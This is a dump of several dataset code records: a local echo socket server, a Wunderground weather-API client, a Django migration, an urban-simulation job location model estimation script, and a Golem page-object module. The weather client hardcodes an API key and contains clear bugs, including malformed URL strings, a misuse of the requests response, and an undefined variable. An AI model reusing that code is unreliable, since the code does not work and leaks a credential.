"line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "296256992", "text": "import socket\nfrom multiprocessing import Process\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\ndef task(conn):\n while True:\n data = conn.recv(1024)\n if not data: # client closed the connection\n break\n conn.send(data.upper())\n conn.close()\n\ndef set_server():\n server.bind(('127.0.0.1', 8080))\n server.listen(5)\n while True:\n conn, caddr = server.accept()\n\n p = Process(target=task, args=(conn,))\n p.start()\n\nif __name__ == '__main__':\n set_server()\n\n", "sub_path": "m4/socket_correlation/Process_Test/socket/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 508, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 4, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 4, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 4, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 5, 
"usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 5, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "617022849", "text": "# File containing classes controlling API calls in weather.py\n\nimport requests\nimport requests_mock\nimport json\n\nclass CurrentCondition: # Current conditions at that location\n\n def current_condition(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/conditions/q/\"+ zipcode +\".json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n location = parsed_json['current_observation']['display_location.full']\n temp_f = parsed_json['current_observation']['temp_f']\n print('Current Temperature in %s is %s' % (location, temp_f))\n r.close()\n\n\n# class MultidayForecast: # 10 day forecast for that location\n#\n# def multiday_forecast(zipcode):\n# r = requests.get(\"\"\"\n# http://api.wunderground.com/api/5f8146a5f07d654c/forecast10day/q/\"+ zipcode +\".json\n# \"\"\")\n# json_string = r.read()\n# parsed_json = json.loads(json_string)\n#\n# for \"period\" in parsed_json:\n\n\n\nclass SunSchedule: # Sunrise and sunset times\n\n def sun_actions(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/astronomy/q/\"+ zipcode +\".json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n sunrise_hour = parsed_json['moon_phase']['sunrise.hour']\n sunrise_minute = parsed_json['moon_phase']['sunrise.minute']\n sunset_minute = parsed_json['moon_phase']['sunset.hour']\n sunset_minute = parsed_json['moon_phase']['sunset.minute']\n print('Sunrise is at: %s:%s' % (sunrise_hour, sunrise_minute))\n print('Sunset is at: %s:%s' % (sunset_hour, sunset_minute))\n r.close()\n\n\nclass WeatherAlert: # Any current weather alerts\n\n def alerts(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/alerts/q/\"+ zipcode +\".json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n alert_description = parsed_json['alerts']['description']\n alert_message = parsed_json['alerts']['message']\n if alert_description:\n print('There is currently a %s alert for your area: ' % alert_description)\n print(alert_message)\n else:\n print('There is currently no weather alert for your area')\n r.close()\n\n\n\nclass ActiveHurricane: # A list of all active hurricanes (anywhere)\n\n def hurricane_checker(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/currenthurricane/view.json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n name = parsed_json['storminfo']['stormName_Nice']\n lat = parsed_json['Current']['lat']\n lon = parsed_json['Current']['lon']\n category = parsed_json['Current']['SaffirSimpsonCategory']\n print(\"\"\"Currently %s is located at %s lattitude, %s longitude and\n is a category %s hurricane\"\"\" % (name, lat, lon, category))\n r.close()\n", "sub_path": "api_calls.py", "file_name": "api_calls.py", "file_ext": "py", "file_size_in_byte": 3119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 14, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", 
"line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "613933810", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('filmfestival', '0009_auto_20150607_2303'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Day',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ],\n ),\n migrations.CreateModel(\n name='Program',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Screening',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('day', models.ForeignKey(to='filmfestival.Program')),\n ('film', models.ForeignKey(to='filmfestival.Film')),\n ],\n ),\n migrations.AddField(\n model_name='day',\n name='program',\n field=models.ForeignKey(to='filmfestival.Program'),\n ),\n ]\n", "sub_path": "filmfestival/migrations/0010_auto_20150610_1341.py", "file_name": "0010_auto_20150610_1341.py", "file_ext": "py", "file_size_in_byte": 1327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 
36, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "168111732", "text": "#!/usr/bin/env python\n# coding: utf-8\nfrom urbansim.models.regression import RegressionModel\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport orca\nfrom urbansim.utils import misc\nimport sys\nimport time\nfrom tqdm import tqdm\nimport yaml\n\nfrom dcm_ard_libs import minimize, neglog_DCM\nfrom fit_large_MNL_LCM import run_elcm_large_MNL\nfrom urbansim_templates import modelmanager as mm\nmm.initialize('configs/elcm_2050')\n\n# from guppy import hpy; h=hpy()\n# import pymrmr\n\n# suppress sklearn warnings\nimport warnings\ndef warn(*args, **kwargs):\n pass\nwarnings.warn = warn # route warnings to the no-op so they are actually suppressed\n\nos.chdir(\"/home/da/semcog_urbansim\")\n\n# import utils\n# data_path = r\"/home/da/share/U_RDF2050/model_inputs/base_hdf\"\ndata_path = r'/home/da/share/urbansim/RDF2050/model_inputs/base_hdf'\nhdf_list = [\n (data_path + \"/\" + f)\n for f in os.listdir(data_path)\n if (\"forecast_data_input\" in f) & (f[-3:] == \".h5\")\n]\nhdf_last = max(hdf_list, key=os.path.getctime)\nhdf = pd.HDFStore(hdf_last, \"r\")\n# hdf = pd.HDFStore(data_path + \"/\" +\"forecast_data_input_091422.h5\", \"r\")\nprint(\"HDF data: \", hdf_last)\n\nvar_validation_list = [\n (data_path + \"/\" + f)\n for f in os.listdir(data_path)\n if (\"variable_validation\" in f) & (f[-5:] == \".yaml\")\n]\nvar_validation_last = max(var_validation_list, key=os.path.getctime)\nwith open(var_validation_last, \"r\") as f:\n vars_config = yaml.load(f, Loader=yaml.FullLoader)\nvalid_b_vars = vars_config[\"buildings\"][\"valid variables\"]\nvalid_job_vars = vars_config[\"jobs\"][\"valid variables\"]\n\n\ndef apply_filter_query(df, filters=None):\n if filters:\n if isinstance(filters, str):\n query = filters\n else:\n query = \" and \".join(filters)\n return df.query(query)\n else:\n return df\n\n\ndef load_hlcm_df(jobs, buildings, job_var, b_var):\n jobs = jobs.to_frame(job_var)\n b = buildings.to_frame(b_var)\n return jobs, b\n\ndef columns_in_vars(jobs, buildings, vars):\n job_columns, b_columns = [], []\n for varname in vars:\n if varname in jobs.columns:\n job_columns.append(varname.strip())\n elif varname in buildings.columns:\n b_columns.append(varname.strip())\n else:\n print(varname, \" not found in either the jobs or buildings table\")\n return job_columns, b_columns\n \n\ndef get_interaction_vars(df, varname):\n \"\"\"Get interaction variables from variable name\n\n Args:\n varname (string): name of the interaction variable\n \"\"\"\n if \":\" in varname:\n var1, var2 = varname.split(\":\")\n var1, var2 = var1.strip(), var2.strip()\n return (df[var1] * df[var2]).values.reshape(-1, 1)\n else:\n return df[varname].values.reshape(-1, 1)\n\n\nused_vars = pd.read_excel(\"/home/da/share/urbansim/RDF2050/model_estimation/configs_elcm_large_area_sector.xlsx\", sheet_name=1)\nv1 = used_vars[~used_vars[\"variables 1\"].isna()][\"variables 1\"].unique()\nv2 = used_vars[~used_vars[\"Variables 2\"].isna()][\"Variables 2\"].unique()\nvars_to_use = np.array(list(set(v1.tolist()).union(v2.tolist())))\n# vars_to_use = used_vars[0].unique()\n\n# config\nchoice_column = \"building_id\"\njob_filter_columns = [\"building_id\", \"slid\", \"home_based_status\"]\nb_filter_columns = [\"large_area_id\", \"non_residential_sqft\", \"vacant_job_spaces\"]\n# load variables\nRELOAD = False\nif RELOAD:\n # from notebooks.models_test import *\n import models\n buildings = 
orca.get_table(\"buildings\")\n jobs = orca.get_table(\"jobs\")\n orca.add_injectable('year', 2020)\n orca.run([\"build_networks_2050\"])\n orca.run([\"neighborhood_vars\"])\n # TODO: get vars from vars list from last forecast\n job_columns, b_columns = columns_in_vars(jobs, buildings, vars_to_use)\n\n job_var = job_columns + job_filter_columns\n b_var = b_columns + b_filter_columns\n job_region, b_region = load_hlcm_df(jobs, buildings, job_var, b_var)\n job_region.to_csv('jobs.csv')\n b_region.to_csv('b_elcm.csv')\nelse:\n job_region = pd.read_csv('jobs.csv', index_col=0)\n b_region = pd.read_csv('b_elcm.csv', index_col=0)\n orca.add_table('jobs', job_region)\n orca.add_table('buildings', b_region)\n\ndef estimation(SLID):\n job_sample_size = 1000\n estimation_sample_size = 80\n # sampling jobs\n # from the new move-ins, last 5-10 years\n # weighted by mcd_quota\n job = job_region[job_region.slid == SLID]\n job = job[job.building_id > 1]\n job = job[job.home_based_status == 0]\n # cap the sample size if the total number of jobs is less than job_sample_size\n job_sample_size = min(job_sample_size, job.shape[0])\n job = job.sample(job_sample_size)\n job = job.reset_index()\n job = job.fillna(0)\n # sampling b\n # sample buildings from the chosen job's buildings list\n bid_sample_pool = b_region[b_region.large_area_id == SLID % 1000].index\n sampled_b_id = []\n for _ in range(estimation_sample_size-1):\n for j in job.building_id:\n sampled_b_id.append(np.random.choice(bid_sample_pool[bid_sample_pool!=j]))\n\n b_sample = b_region.loc[sampled_b_id]\n b_sample = pd.concat([b_region.loc[job.building_id], b_sample])\n b_sample = b_sample.reset_index()\n b_sample = b_sample.fillna(0)\n # remove unnecessary col in jobs\n job = job[[col for col in job.columns if col not in job_filter_columns+[\"job_id\"]]]\n # remove unnecessary col in buildings\n b_sample = b_sample[[col for col in b_sample.columns if col not in b_filter_columns]]\n\n X_df = pd.concat(\n [pd.concat([job]*estimation_sample_size).reset_index(drop=True), b_sample], axis=1)\n # Y: 1 for the building picked\n # Y = X_df.building_id.isin(picked_bid).astype(int).values\n # Y: set the first job_sample_size items to 1\n Y = np.zeros((job_sample_size*estimation_sample_size,1), dtype=int)\n Y[:job_sample_size,0] = 1\n # remove extra cols\n X_df = X_df[[col for col in X_df.columns if col not in ['building_id']]]\n # create interaction variables\n newX_cols_name = vars_to_use\n X_wiv = np.array([])\n for varname in newX_cols_name:\n if X_wiv.size > 0:\n X_wiv = np.concatenate((X_wiv, get_interaction_vars(X_df, varname)), axis=1)\n else:\n X_wiv = get_interaction_vars(X_df, varname)\n\n # df to ndarray\n X = X_wiv\n\n # col index with 0 variation\n used_val = np.arange(X.shape[1])[np.std(X, axis=0, dtype=np.float64) > 0]\n unused_val = np.array([x for x in range(X.shape[1]) if x not in used_val])\n\n # only keep variables with variation\n X = X[:, np.std(X, axis=0, dtype=np.float64) > 0]\n # standardize X\n X = (X - np.mean(X, axis=0)) / np.std(X, axis=0, dtype=np.float64)\n # shuffle X\n shuffled_index = np.arange(Y.size)\n np.random.shuffle(shuffled_index)\n X = X[shuffled_index, :].astype(float)\n Y = Y[shuffled_index].reshape(-1, 1)\n # TODO: Y_onehot\n Y_onehot = Y\n # available_choice is 1\n available_choice = np.ones((X.shape[0], 1))\n\n # theta: m x 1\n theta = np.zeros((X.shape[1], 1))\n\n # dtypes conversion\n X = {0:X, 1:X}\n theta = {0:theta, 1:theta}\n Y = 1 - Y # 0 means picked, 1 means not picked\n Y_onehot = np.concatenate((Y_onehot, 1-Y_onehot), axis=1)\n 
available_choice = np.concatenate((available_choice, available_choice), axis=1)\n\n t0 = time.time()\n theta_optim_full = minimize(theta, neglog_DCM, -3000, X, Y, Y_onehot, available_choice)\n t1 = time.time()\n print(\"minimizer finished in \", t1-t0)\n\n # exporting theta\n out_theta = pd.DataFrame(theta_optim_full[0], columns=['theta'])\n out_theta.index = newX_cols_name[used_val]\n out_theta = out_theta.loc[out_theta.theta.abs().sort_values(ascending=False).index]\n out_theta.to_csv('./configs/elcm_2050/thetas/out_theta_job_%s_%s.txt' % (SLID, estimation_sample_size))\n\n print(\"Warning: variables with 0 variation\")\n print(newX_cols_name[unused_val.tolist()])\n print('ARD-DCM done')\n\nif __name__ == \"__main__\":\n # run_elcm_large_MNL(job_region, b_region, 1100115, 10)\n slid_list = job_region['slid'].unique().tolist()\n for slid in slid_list:\n # if selected sector_id, skip it and use job scaling model instead\n sector_id = slid // 100000\n if sector_id in [1, 7, 12, 13, 15, 18]:\n continue\n # skip slid which have very small sample size\n if slid in [1100115, 1100147]:\n continue\n # estimation(slid)\n run_elcm_large_MNL(slid, 20)\n # estimation(500125)\n # run_elcm_large_MNL(job_region, b_region, 500125, 30)\n # slid which have failed LargeMNL run due to LinAlgError:\n # [500115, 500093, 1100093, 1500115]", "sub_path": "ELCM_estimation.py", "file_name": "ELCM_estimation.py", "file_ext": "py", "file_size_in_byte": 8531, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urbansim_templates.modelmanager.initialize", "line_number": 19, "usage_type": "call"}, {"api_name": "urbansim_templates.modelmanager", "line_number": 19, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.HDFStore", "line_number": 39, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 50, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "orca.get_table", "line_number": 112, "usage_type": "call"}, {"api_name": "orca.get_table", "line_number": 113, "usage_type": "call"}, {"api_name": "orca.add_injectable", "line_number": 114, "usage_type": "call"}, {"api_name": "orca.run", "line_number": 115, "usage_type": "call"}, {"api_name": "orca.run", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "orca.add_table", "line_number": 128, "usage_type": "call"}, {"api_name": "orca.add_table", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 162, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 184, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 188, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 209, "usage_type": "call"}, {"api_name": "time.time", "line_number": 211, "usage_type": "call"}, {"api_name": "dcm_ard_libs.minimize", "line_number": 212, "usage_type": "call"}, {"api_name": "dcm_ard_libs.neglog_DCM", "line_number": 212, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 213, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 217, "usage_type": "call"}, {"api_name": "fit_large_MNL_LCM.run_elcm_large_MNL", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "9202642", "text": "\"\"\"Methods for dealing with page object modules\nPage object are modules located inside /pages/ directory\n\"\"\"\nimport importlib\nimport os\nimport types\nimport inspect\n\nfrom golem.core import utils, file_manager\n\n\ndef page_exists(root_path, project, full_page_name):\n \"\"\"Page object exists.\n full_page_name must be dot path from the /project/pages/ \n directory\n Example: \n testdir/projects/project1/pages/modulex/pagex.py\n page_exists(root_path, 'project1', 'modulex.pagex') -> True\n \"\"\"\n page_rel_path = os.sep.join(full_page_name.split('.'))\n path = os.path.join(root_path, 'projects', project, 'pages',\n page_rel_path + '.py')\n return os.path.isfile(path)\n\n\ndef get_page_object_content(project, full_page_name):\n \"\"\"Parses a page object and returns it's contents\n in dictionary format.\n \n Page Object Contents:\n functions : list of functions\n elements : web elements defined inside page\n import lines : list of import lines\n source code : source code as string\n\n Each function contains:\n function_name\n description\n arguments\n code\n\n Each element contains:\n element_selector\n element_value\n element_display_name\n element_full_name\n \"\"\"\n po_data = {\n 'functions': [],\n 'elements': [],\n 'import_lines': [],\n 'code_lines': [],\n 'source_code': ''\n }\n _ = 'projects.{0}.pages.{1}'.format(project, full_page_name)\n modulex = importlib.import_module(_)\n # get all the names of the module,\n # ignoring the ones starting with '_'\n variable_list = [i for i in dir(modulex) if not i.startswith(\"_\")]\n \n # get all the import lines in a list\n try:\n po_data['source_code'] = inspect.getsource(modulex)\n except:\n 
print('Parsing of {} failed'.format(full_page_name))\n po_data['code_lines'] = po_data['source_code'].split('\\n')\n for line in po_data['code_lines']:\n if 'import' in line:\n po_data['import_lines'].append(line)\n for var_name in variable_list:\n variable = getattr(modulex, var_name)\n if isinstance(variable, types.FunctionType):\n # this is a function\n new_function = {\n 'function_name': var_name,\n 'full_function_name': ''.join([full_page_name, '.', var_name]),\n 'description': inspect.getdoc(variable),\n 'arguments': list(inspect.signature(variable).parameters),\n 'code': inspect.getsource(variable)\n }\n po_data['functions'].append(new_function)\n elif isinstance(variable, tuple):\n # this is a web element tuple\n if len(variable) >= 2:\n element_display_name = ''\n if len(variable) >= 3:\n element_display_name = variable[2]\n new_element = {\n 'element_name': var_name,\n 'element_selector': variable[0],\n 'element_value': variable[1],\n 'element_display_name': element_display_name,\n 'element_full_name': ''.join([full_page_name, '.', var_name])\n }\n po_data['elements'].append(new_element)\n # elif isinstance(variable, types.ModuleType):\n # pass\n else:\n pass\n # print('ERROR', variable)\n return po_data\n\n\ndef get_page_object_code(path):\n \"\"\"Get the page object code as string given the full path\n to the python file\"\"\"\n code = ''\n if os.path.isfile(path):\n with open(path) as ff:\n code = ff.read()\n return code\n\n\ndef save_page_object(root_path, project, full_page_name, elements,\n functions, import_lines):\n \"\"\"Save Page Object contents to file.\n full_page_name must be a dot path starting from the /project/pages/\n directory (i.e.: 'module.sub_module.page_name_01')\n \"\"\"\n def format_element_string(name, selector, value, display_name):\n formatted = (\"\\n\\n{0} = ('{1}', \\'{2}\\', '{3}')\"\n .format(name, selector, value, display_name)\n )\n return formatted\n\n page_name, parents = utils.separate_file_from_parents(full_page_name)\n page_object_path = os.path.join(root_path, 'projects', project, 'pages',\n os.sep.join(parents), '{}.py'.format(page_name))\n with open(page_object_path, 'w', encoding='utf-8') as po_file:\n for line in import_lines:\n po_file.write(\"{}\\n\".format(line))\n for element in elements:\n # replace spaces in the element name with underscores\n if ' ' in element['name']:\n element['name'] = element['name'].replace(' ', '_')\n # escape quote characters\n element['value'] = element['value'].replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\")\n if not element['display_name']:\n element['display_name'] = element['name']\n formatted = format_element_string(element['name'],\n element['selector'],\n element['value'],\n element['display_name'])\n po_file.write(formatted)\n for func in functions:\n po_file.write('\\n\\n' + func)\n\n\ndef save_page_object_code(root_path, project, full_page_name, content):\n \"\"\"Save a Page Object given its full code as a string.\n full_page_name must be a dot path starting from /project/pages/\n directory.\n content must be the file content as string\n \"\"\"\n page_name, parents = utils.separate_file_from_parents(full_page_name)\n page_path = os.path.join(root_path, 'projects', project, 'pages',\n os.sep.join(parents), '{}.py'.format(page_name))\n with open(page_path, 'w', encoding='utf-8') as po_file:\n po_file.write(content)\n\n\ndef new_page_object(root_path, project, parents, page_name):\n \"\"\"Create a new page object.\n Parents is a list of directories 
and subdirectories where the\n page should be stored.\n Parent directories will be added\n if they do not exist.\"\"\"\n errors = []\n base_path = os.path.join(root_path, 'projects', project, 'pages')\n full_path = os.path.join(base_path, os.sep.join(parents))\n filepath = os.path.join(full_path, '{}.py'.format(page_name))\n if os.path.isfile(filepath):\n errors.append('A page file with that name already exists')\n if not errors:\n if not os.path.isdir(full_path):\n for parent in parents:\n base_path = os.path.join(base_path, parent)\n file_manager.create_directory(path=base_path,\n add_init=True)\n with open(filepath, 'w') as po_file:\n po_file.write('')\n return errors\n\n\ndef generate_page_path(root_path, project, full_page_name):\n \"\"\"Generates a path to a page object python file\n Example:\n generate_page_path('user/testdir', 'project1', 'module1.page1')\n -> 'user/testdir/projects/project1/pages/module1/page1.py'\n \"\"\"\n page_name, parents = utils.separate_file_from_parents(full_page_name)\n page_path = os.path.join(root_path, 'projects', project, 'pages',\n os.sep.join(parents), '{}.py'.format(page_name))\n return page_path\n\n\ndef pages_base_dir(root_path, project):\n \"\"\"Generate base dir for pages.\n i.e.: <root_path>/projects/<project>/pages/\n \"\"\"\n return os.path.join(root_path, 'projects', project, 'pages')\n", "sub_path": "golem/core/page_object.py", "file_name": "page_object.py", "file_ext": "py", "file_size_in_byte": 7753, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.sep.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 56, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 63, "usage_type": "call"}, {"api_name": "types.FunctionType", "line_number": 72, "usage_type": "attribute"}, {"api_name": "inspect.getdoc", "line_number": 77, "usage_type": "call"}, {"api_name": "inspect.signature", "line_number": 78, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "golem.core.utils.separate_file_from_parents", "line_number": 127, "usage_type": "call"}, {"api_name": "golem.core.utils", "line_number": 127, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 129, "usage_type": "attribute"}, {"api_name": "golem.core.utils.separate_file_from_parents", "line_number": 156, "usage_type": "call"}, {"api_name": "golem.core.utils", "line_number": 156, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 158, "usage_type": 
